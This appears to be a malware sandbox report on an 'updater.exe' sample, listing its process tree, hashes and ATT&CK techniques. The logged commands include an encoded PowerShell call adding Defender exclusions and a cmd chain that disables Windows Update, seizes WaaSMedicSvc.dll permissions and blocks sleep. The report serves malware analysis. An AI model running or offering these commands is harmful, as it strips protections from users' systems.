powershell -EncodedCommand "PAAjAHkAegAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAawBrAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAZABkACMAPgA="
8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:1564

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:1728

C:\Windows\system32\sc.exe
sc stop bits
8⤵
PID:2020

C:\Windows\system32\sc.exe
sc stop dosvc
8⤵
PID:936

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:892

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:1268

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:1164

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:652

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:684

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:1868

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:1160

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:1756

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:1972

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:1860

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:1044

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:1620

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2008

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:468

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
8⤵
PID:1520

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
8⤵
PID:664

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
8⤵
PID:1096

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
8⤵
PID:1236

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
8⤵
PID:1044

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
8⤵
PID:1268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
8⤵
PID:1540

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
8⤵
PID:992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
8⤵
PID:936

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
8⤵
PID:1808

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
8⤵
PID:1704

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
8⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
7⤵
PID:1828

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:280

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:628

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
7⤵
PID:1912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "fuljhipnixrs"
8⤵
PID:1280

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1235216285-17481519796525988251090482561329627408-891649471-93506122667644597"
1⤵
PID:1360

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-16587682591979942943-9153801212099621825-11118662631650409571687258222-586245067"
1⤵
PID:896

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1439334932-115771309094871624388448614-285824623-2110871029-66494881543513245"
1⤵
PID:1760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "21387137201439559279-1025508788-1005846101-1821070085-822745704-913150316-1603537163"
1⤵
PID:1284

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
40caa9b00badca24594571e157a6d2a9

SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565

SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
40caa9b00badca24594571e157a6d2a9

SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565

SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
99a4b5aac897023fee145b366fa2ddde

SHA1
b80861232a12cdd385a136a33029aec6102286b1

SHA256
193a1989edcbf85076bf29d7982f0a1ec59f5f08698b9cfa85095a73b152bb8e

SHA512
9d9603af8322a876f0d7f999b764fe31bc8529f0861a67cf4f543b7548ddd2149290daa8067a1a19103020811181785a16246b459b6aa1b7a7cdf993005305dd

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
564B

MD5
aa0b9f108a1f91b20b74cf69348662fd

SHA1
63f2cedea1360d511b1eb8644b0e64231087fdea

SHA256
1dd7311f15789bde3d4045d18f7636c8f1c809afe945d19792985d2e0330da10

SHA512
fd3a96ba9d26e75a04a8ea3a0aa1df8f4906da1bf4a6cd64f1fdc50a72a31dcd80672773b36e22733e30209c19f2b3e117ebc6979d04b8169cb7eb423974bdca

Download Submit
\Users\Admin\AppData\Local\Temp\Chrome\updater.exe
Filesize
2.2MB

MD5
40caa9b00badca24594571e157a6d2a9

SHA1
42f2faf2aa59f38c16824eaa1dc022fddb142565

SHA256
7b2d31964fa60aa56d6bf8cc332e5f0f956efef88c4632ed1522c4beef054442

SHA512
e8517ff311d81efe14707629f1730ca329db66b92d17ff711945ec5a0313de3cc914d59fd621bfcb907750b0947778784da191c0c6d703c92f788e61dc5e34d3

Download Submit
memory/268-64-0x0000000000000000-mapping.dmp

Download
memory/280-70-0x0000000000000000-mapping.dmp

Download
memory/280-312-0x0000000000000000-mapping.dmp

Download
memory/300-258-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/300-256-0x0000000000AA0000-0x0000000000ACA000-memory.dmp

Filesize
168KB

Download
memory/416-142-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/416-143-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/416-140-0x0000000000940000-0x0000000000963000-memory.dmp

Filesize
140KB

Download
memory/416-158-0x0000000000970000-0x000000000099A000-memory.dmp

Filesize
168KB

Download
memory/416-151-0x0000000000940000-0x0000000000963000-memory.dmp

Filesize
140KB

Download
memory/460-149-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/460-147-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/460-161-0x0000000000240000-0x000000000026A000-memory.dmp

Filesize
168KB

Download
memory/476-152-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/476-154-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/476-168-0x00000000001C0000-0x00000000001EA000-memory.dmp

Filesize
168KB

Download
memory/484-163-0x0000000000350000-0x000000000037A000-memory.dmp

Filesize
168KB

Download
memory/484-165-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/484-162-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/520-105-0x0000000000000000-mapping.dmp

Download
memory/576-171-0x00000000004B0000-0x00000000004DA000-memory.dmp

Filesize
168KB

Download
memory/576-172-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/576-169-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/584-254-0x0000000000990000-0x00000000009BA000-memory.dmp

Filesize
168KB

Download
memory/628-330-0x0000000000000000-mapping.dmp

Download
memory/652-375-0x0000000000000000-mapping.dmp

Download
memory/656-175-0x00000000003F0000-0x000000000041A000-memory.dmp

Filesize
168KB

Download
memory/656-177-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/656-174-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/676-109-0x0000000000000000-mapping.dmp

Download
memory/676-69-0x0000000000000000-mapping.dmp

Download
memory/684-391-0x0000000000000000-mapping.dmp

Download
memory/684-98-0x0000000000000000-mapping.dmp

Download
memory/732-111-0x0000000000000000-mapping.dmp

Download
memory/736-185-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/736-241-0x00000000009A0000-0x00000000009CA000-memory.dmp

Filesize
168KB

Download
memory/736-184-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/748-290-0x00000000007D0000-0x00000000007FA000-memory.dmp

Filesize
168KB

Download
memory/748-291-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/800-183-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/800-182-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/800-232-0x00000000008B0000-0x00000000008DA000-memory.dmp

Filesize
168KB

Download
memory/816-101-0x0000000000000000-mapping.dmp

Download
memory/828-188-0x000007FEBEDA0000-0x000007FEBEDB0000-memory.dmp

Filesize
64KB

Download
memory/828-245-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/828-243-0x0000000000230000-0x000000000025A000-memory.dmp

Filesize
168KB

Download
memory/848-287-0x0000000000320000-0x000000000034A000-memory.dmp

Filesize
168KB

Download
memory/848-288-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/860-96-0x0000000000000000-mapping.dmp

Download
memory/868-255-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/868-247-0x0000000000A80000-0x0000000000AAA000-memory.dmp

Filesize
168KB

Download
memory/892-121-0x0000000000000000-mapping.dmp

Download
memory/892-123-0x0000000075B61000-0x0000000075B63000-memory.dmp

Filesize
8KB

Download
memory/892-137-0x0000000074460000-0x0000000074A0B000-memory.dmp

Filesize
5.7MB

Download
memory/892-345-0x0000000000000000-mapping.dmp

Download
memory/896-282-0x0000000001B50000-0x0000000001B7A000-memory.dmp

Filesize
168KB

Download
memory/896-284-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/924-261-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/924-260-0x0000000000360000-0x000000000038A000-memory.dmp

Filesize
168KB

Download
memory/936-342-0x0000000000000000-mapping.dmp

Download
memory/992-72-0x0000000000000000-mapping.dmp

Download
memory/1012-66-0x0000000000000000-mapping.dmp

Download
memory/1040-81-0x0000000000000000-mapping.dmp

Download
memory/1044-77-0x0000000000000000-mapping.dmp

Download
memory/1080-263-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1080-262-0x0000000000480000-0x00000000004AA000-memory.dmp

Filesize
168KB

Download
memory/1108-267-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1108-265-0x0000000001E10000-0x0000000001E3A000-memory.dmp

Filesize
168KB

Download
memory/1116-107-0x0000000000000000-mapping.dmp

Download
memory/1116-67-0x0000000000000000-mapping.dmp

Download
memory/1164-360-0x0000000000000000-mapping.dmp

Download
memory/1172-269-0x0000000000250000-0x000000000027A000-memory.dmp

Filesize
168KB

Download
memory/1172-279-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1196-207-0x0000000000000000-mapping.dmp

Download
memory/1196-278-0x0000000000350000-0x000000000037A000-memory.dmp

Filesize
168KB

Download
memory/1196-65-0x0000000000000000-mapping.dmp

Download
memory/1204-286-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1204-285-0x0000000002970000-0x000000000299A000-memory.dmp

Filesize
168KB

Download
memory/1240-68-0x0000000000000000-mapping.dmp

Download
memory/1268-62-0x0000000001F94000-0x0000000001F97000-memory.dmp

Filesize
12KB

Download
memory/1268-61-0x000007FEED550000-0x000007FEEE0AD000-memory.dmp

Filesize
11.4MB

Download
memory/1268-349-0x0000000000000000-mapping.dmp

Download
memory/1268-63-0x0000000001F9B000-0x0000000001FBA000-memory.dmp

Filesize
124KB

Download
memory/1268-59-0x0000000000000000-mapping.dmp

Download
memory/1304-104-0x0000000000000000-mapping.dmp

Download
memory/1356-99-0x0000000000000000-mapping.dmp

Download
memory/1360-249-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1360-251-0x00000000007C0000-0x00000000007EA000-memory.dmp

Filesize
168KB

Download
memory/1396-102-0x0000000000000000-mapping.dmp

Download
memory/1432-118-0x0000000000000000-mapping.dmp

Download
memory/1488-350-0x0000000000000000-mapping.dmp

Download
memory/1488-87-0x0000000000000000-mapping.dmp

Download
memory/1536-116-0x0000000000000000-mapping.dmp

Download
memory/1536-73-0x0000000000000000-mapping.dmp

Download
memory/1564-322-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1564-318-0x0000000000600000-0x000000000062A000-memory.dmp

Filesize
168KB

Download
memory/1564-303-0x0000000000000000-mapping.dmp

Download
memory/1572-91-0x0000000000000000-mapping.dmp

Download
memory/1600-252-0x0000000000220000-0x000000000024A000-memory.dmp

Filesize
168KB

Download
memory/1600-131-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1600-136-0x0000000077620000-0x000000007773F000-memory.dmp

Filesize
1.1MB

Download
memory/1600-100-0x0000000000000000-mapping.dmp

Download
memory/1600-135-0x0000000077840000-0x00000000779E9000-memory.dmp

Filesize
1.7MB

Download
memory/1600-134-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1600-138-0x0000000140000000-0x0000000140040000-memory.dmp

Filesize
256KB

Download
memory/1600-139-0x0000000077840000-0x00000000779E9000-memory.dmp

Filesize
1.7MB

Download
memory/1600-132-0x00000001400024C8-mapping.dmp

Download
memory/1684-84-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-85-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-86-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-90-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-106-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-88-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-95-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-93-0x0000000140002348-mapping.dmp

Download
memory/1684-78-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-82-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-79-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1684-92-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1728-314-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1728-311-0x0000000000000000-mapping.dmp

Download
memory/1728-313-0x0000000000130000-0x000000000015A000-memory.dmp

Filesize
168KB

Download
memory/1740-58-0x0000000000000000-mapping.dmp

Download
memory/1784-293-0x000000001B010000-0x000000001B03A000-memory.dmp

Filesize
168KB

Download
memory/1784-289-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/1784-219-0x0000000000000000-mapping.dmp

Download
memory/1784-292-0x00000000024EB000-0x000000000250A000-memory.dmp

Filesize
124KB

Download
memory/1788-110-0x0000000000000000-mapping.dmp

Download
memory/1796-115-0x0000000000000000-mapping.dmp

Download
memory/1800-239-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1800-236-0x00000000003B0000-0x00000000003DA000-memory.dmp

Filesize
168KB

Download
memory/1828-307-0x0000000000000000-mapping.dmp

Download
memory/1860-108-0x0000000000000000-mapping.dmp

Download
memory/1868-402-0x0000000000000000-mapping.dmp

Download
memory/1912-117-0x0000000000000000-mapping.dmp

Download
memory/1912-386-0x0000000000401BEA-mapping.dmp

Download
memory/1912-76-0x0000000000000000-mapping.dmp

Download
memory/1924-55-0x0000000000210000-0x000000000044B000-memory.dmp

Filesize
2.2MB

Download
memory/1924-57-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp

Filesize
8KB

Download
memory/1924-56-0x000000001B0C0000-0x000000001B2E4000-memory.dmp

Filesize
2.1MB

Download
memory/1924-54-0x000000001B300000-0x000000001B53C000-memory.dmp

Filesize
2.2MB

Download
memory/1924-75-0x00000000021C0000-0x00000000021C6000-memory.dmp

Filesize
24KB

Download
memory/1952-74-0x0000000000000000-mapping.dmp

Download
memory/1952-275-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/1952-272-0x000000001AC30000-0x000000001AC5A000-memory.dmp

Filesize
168KB

Download
memory/1960-113-0x0000000000000000-mapping.dmp

Download
memory/1972-316-0x0000000000000000-mapping.dmp

Download
memory/1972-71-0x0000000000000000-mapping.dmp

Download
memory/1980-114-0x0000000000000000-mapping.dmp

Download
memory/1988-156-0x0000000000000000-mapping.dmp

Download
memory/2004-112-0x0000000000000000-mapping.dmp

Download
memory/2008-128-0x000000000094B000-0x000000000096A000-memory.dmp

Filesize
124KB

Download
memory/2008-127-0x0000000000944000-0x0000000000947000-memory.dmp

Filesize
12KB

Download
memory/2008-125-0x0000000077840000-0x00000000779E9000-memory.dmp

Filesize
1.7MB

Download
memory/2008-124-0x000007FEED0A0000-0x000007FEEDBFD000-memory.dmp

Filesize
11.4MB

Download
memory/2008-129-0x0000000077840000-0x00000000779E9000-memory.dmp

Filesize
1.7MB

Download
memory/2008-120-0x0000000000000000-mapping.dmp

Download
memory/2008-130-0x0000000077620000-0x000000007773F000-memory.dmp

Filesize
1.1MB

Download
memory/2020-153-0x0000000000000000-mapping.dmp

Download
memory/2020-323-0x0000000000000000-mapping.dmp

Download
memory/2020-320-0x0000000037880000-0x0000000037890000-memory.dmp

Filesize
64KB

Download
memory/2028-119-0x0000000000000000-mapping.dmp

Download
memory/2032-103-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads